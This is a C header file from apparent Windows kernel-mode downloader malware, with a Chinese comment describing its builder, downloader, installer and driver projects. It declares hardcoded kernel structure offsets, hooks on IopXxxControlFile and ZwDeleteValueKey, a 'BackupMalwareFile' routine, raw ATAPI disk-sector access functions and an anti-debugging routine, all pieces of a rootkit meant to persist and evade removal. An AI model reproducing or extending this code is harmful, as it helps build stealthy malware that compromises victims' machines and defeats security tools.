hookfile.h

下载者包括四个工程： CDown：生成器 userinit：真正的下载者 Dat：驱动和下载者的安装程序 pass：驱动程序

	0x124,		// OFFSET_EPROCESS_ParentPID
	0x14C,		// OFFSET_EPROCESS_ImageFileName
	0x188,		// OFFSET_EPROCESS_PEB
	0x228,		// OFFSET_EPROCESS_ProcessExiting
	0x004,		// OFFSET_EPROCESS_ProcExitMask
	0x008,		// OFFSET_EPROCESS_ProcDelMask
	0x168,		// OFFSET_EPROCESS_ThreadListHead
	0x20C,		// OFFSET_ETHREAD_Cid
	0x1F8,		// OFFSET_ETHREAD_StartAddress
	0x240,		// OFFSET_ETHREAD_W32StartAddress
	0x144,		// OFFSET_ETHREAD_ThreadProcess
	0x248,		// OFFSET_ETHREAD_ThreadListEntry
	0x010,		// OFFSET_PEB_ProcParam
	0x070,		// OFFSET_KTHREAD_WaitListEntry
	(ULONG)-1,	// OFFSET_EPROCESS_ExitProcessCalled

	0x42,		// CALLBACK_ID_CLIENTLOADLIBRARY
};


typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation,
		SystemProcessorInformation,
		SystemPerformanceInformation,
		SystemTimeOfDayInformation,
		SystemPathInformation,
		SystemProcessInformation,
		SystemCallCountInformation,
		SystemDeviceInformation,
		SystemProcessorPerformanceInformation,
		SystemFlagsInformation,
		SystemCallTimeInformation,
		SystemModuleInformation,
		SystemLocksInformation,
		SystemStackTraceInformation,
		SystemPagedPoolInformation,
		SystemNonPagedPoolInformation,
		SystemHandleInformation,
		SystemObjectInformation,
		SystemPageFileInformation,
		SystemVdmInstemulInformation,
		SystemVdmBopInformation,
		SystemFileCacheInformation,
		SystemPoolTagInformation,
		SystemInterruptInformation,
		SystemDpcBehaviorInformation,
		SystemFullMemoryInformation,
		SystemLoadGdiDriverInformation,
		SystemUnloadGdiDriverInformation,
		SystemTimeAdjustmentInformation,
		SystemSummaryMemoryInformation,
		SystemUnused1,
		SystemPerformanceTraceInformation,
		SystemCrashDumpInformation,
		SystemExceptionInformation,
		SystemCrashDumpStateInformation,
		SystemKernelDebuggerInformation,
		SystemContextSwitchInformation,
		SystemRegistryQuotaInformation,
		SystemExtendServiceTableInformation,
		SystemPrioritySeperation,
		SystemUnused3,
		SystemUnused4,
		SystemUnused5,
		SystemUnused6,
		SystemCurrentTimeZoneInformation,
		SystemLookasideInformation,
		SystemTimeSlipNotification,
		SystemSessionCreate,
		SystemSessionDetach,
		SystemSessionInformation
} SYSTEM_INFORMATION_CLASS;


extern POBJECT_TYPE IoDriverObjectType; 

NTKERNELAPI
PDEVICE_OBJECT
IoGetBaseFileSystemDeviceObject(
								__in PFILE_OBJECT FileObject
    );

extern 
NTKERNELAPI 
NTSTATUS 
ObReferenceObjectByName( 
						IN PUNICODE_STRING ObjectName, 
						IN ULONG Attributes, 
						IN PACCESS_STATE PassedAccessState OPTIONAL, 
						IN ACCESS_MASK DesiredAccess OPTIONAL, 
						IN POBJECT_TYPE ObjectType, 
						IN KPROCESSOR_MODE AccessMode, 
						IN OUT PVOID ParseContext OPTIONAL, 
						OUT PVOID *Object 
    ); 

typedef 
NTSTATUS 
(*XXXObReferenceObjectByName)( 
						IN PUNICODE_STRING ObjectName, 
						IN ULONG Attributes, 
						IN PACCESS_STATE PassedAccessState OPTIONAL, 
						IN ACCESS_MASK DesiredAccess OPTIONAL, 
						IN POBJECT_TYPE ObjectType, 
						IN KPROCESSOR_MODE AccessMode, 
						IN OUT PVOID ParseContext OPTIONAL, 
						OUT PVOID *Object 
    ); 

extern
NTSYSAPI
NTSTATUS
NTAPI
ZwQuerySystemInformation (
						  IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
						  OUT PVOID SystemInformation,
						  IN ULONG SystemInformationLength,
						  OUT PULONG ReturnLength OPTIONAL
    );

__declspec(dllimport) WORD NtBuildNumber;
//__declspec(dllimport) POBJECT_TYPE* PsProcessType;

NTSYSAPI
NTSTATUS
PsLookupProcessByProcessId(
	IN	ULONG			nPID, 
	OUT	PEPROCESS*		pProcess
	);

NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject);
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT pDeviceObj, IN PIRP pIrp );
NTSTATUS DriverDeviceControl( PDEVICE_OBJECT pDeviceObj, PIRP pIrp);
NTSTATUS MakeKRodogDir( PUNICODE_STRING punistrParentDir);


#define MEMORYTAG 'oMaS'

#define INVALID_HANDLE_VALUE ((HANDLE)(LONG_PTR)-1)
// 模拟的new
#define new__(type, size) \
	(type*)ExAllocatePoolWithTag(NonPagedPool, sizeof(BYTE) * size, MEMORYTAG)

#define delete_(p) \
	do{if(!p) break; ExFreePool(p); p = NULL;}while(0)

#define	INSTALL_PATH_KEY	\
	L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment"

#define INSTALL_PATH_VALUE	\
	L"TEMP"


BOOLEAN GetSystemOffset();

OS_OFFSET g_GlobalOffset;

BOOL CanAccessPeFile( HANDLE hFileHandle);
NTSTATUS BackupMalwareFile();
NTSTATUS GetTempPath(PUNICODE_STRING pustrInstallPath);
NTSTATUS KernelCopyFile( PUNICODE_STRING pDestFile, PUNICODE_STRING pExistFile);
POBJECT_NAME_INFORMATION GetProcessFullPath( PVOID Object);

BOOL HookIopXxxControlFile();
BOOL UnHookIopXxxControlFile();
void HookNtDeleteValue();
void UnHookNtDeleteValue();


NTKERNELAPI
NTSTATUS
ObQueryNameString(
    PVOID Object,
    POBJECT_NAME_INFORMATION ObjectNameInfo,
    ULONG Length,
    PULONG ReturnLength
    );

NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteValueKey(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName
    );

NTSYSAPI
NTSTATUS 
ZwQueryKey(
		   IN HANDLE  KeyHandle,
		   IN KEY_INFORMATION_CLASS  KeyInformationClass,
		   OUT PVOID  KeyInformation,
		   IN ULONG  Length,
		   OUT PULONG  ResultLength
		   );

NTSTATUS FakeZwDeleteValueKey(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName
    );

typedef NTSTATUS (*XXXZwDeleteValueKey)(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName
    );

typedef NTSTATUS (*XXXIopXxxControlFile)
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength,
    IN BOOLEAN DeviceIoControl
);

NTSTATUS MyIopXxxControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength,
    IN BOOLEAN DeviceIoControl
);

NTSTATUS LogThreat();


NTSTATUS
SendCommandCompletion(
					  IN PDEVICE_OBJECT DeviceObject,
					  IN PIRP Irp,
					  IN PVOID Context
    );


typedef struct {
	
    LARGE_INTEGER StartingVcn;
	
} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER;

typedef struct RETRIEVAL_POINTERS_BUFFER {
	
    ULONG ExtentCount;
    LARGE_INTEGER StartingVcn;
    struct {
        LARGE_INTEGER NextVcn;
        LARGE_INTEGER Lcn;
    } Extents[1];
	
} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER;

NTSTATUS
SendCommand(
			IN PDEVICE_OBJECT DeviceObject, 
			IN ULONG MajorFunction, 
			IN PVOID Buffer, 
			IN ULONG SectorOffset, 
			IN ULONG SendSectorCount
    );

NTSTATUS FsGetFileRetrievalPointers(PVOID Buffer, DWORD dwLength);
PDEVICE_OBJECT	GetAtapiDevice();

ULONG
GetModuleBase(
			  PUCHAR ModuleFileName
			  );
ULONG GetModuleBaseAndSize( PUCHAR ModuleFileName, OUT PDWORD dwSize);

DWORD GetIntEntry( DWORD Index);


__inline VOID AntiDebugBySEH(VOID)
{
	// this function must run in IRQL==PASSIVE_LEVEL
	
	DWORD	dwIndex = 0;
	
	if ( KeGetCurrentIrql() == PASSIVE_LEVEL )
	{
		__try
		{
			ProbeForRead( PsGetCurrentProcess(), 0x1020, FALSE);
		}
		__except(1)
		{
			dwIndex++;
		}
	}
}

BOOL GetNtOSKernelBase();

NTSTATUS
FASTCALL
MyIofCallDriver(
			  __in PDEVICE_OBJECT DeviceObject,
			  __inout PIRP Irp
    );


PDEVICE_OBJECT
MyIoGetBaseFileSystemDeviceObject(
								  IN PFILE_OBJECT FileObject
								);

BOOL GetAtapiDispatchFromFile( LPDWORD pDispatch, LPDWORD pInternRoutine);

#endif